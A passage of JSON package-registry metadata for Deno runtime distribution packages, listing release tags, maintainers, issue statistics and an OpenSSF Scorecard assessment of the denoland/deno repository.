es/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T14:04:53.900Z","dependent_packages_count":0,"downloads":464923,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/linux-x64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/linux-x64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/linux-x64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/linux-x64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T22:08:47.667Z","updated_at":"2024-12-12T22:08:47.667Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T22:08:48.055Z","updated_at":"2024-12-12T22:08:48.055Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T22:08:48.128Z","updated_at":"2024-12-12T22:08:48.128Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:51.179Z","updated_at":"2026-03-27T13:02:51.179Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5836603,"maintainers_count":1249644,"namespaces_count":427708,"keywords_count":891347,"github":"npm","metadata":{"funded_packages_count":192785,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-04T05:03:39.333Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12401476,"name":"org.mvnpm.at.deno:win32-arm64","ecosystem":"maven","description":"win32-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":18,"first_release_published_at":"2025-10-20T11:32:28.000Z","latest_release_published_at":"2026-08-30T02:06:28.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:53:50.784Z","created_at":"2025-10-20T11:46:21.387Z","updated_at":"2026-09-07T22:53:50.785Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/win32-arm64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/win32-arm64/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using 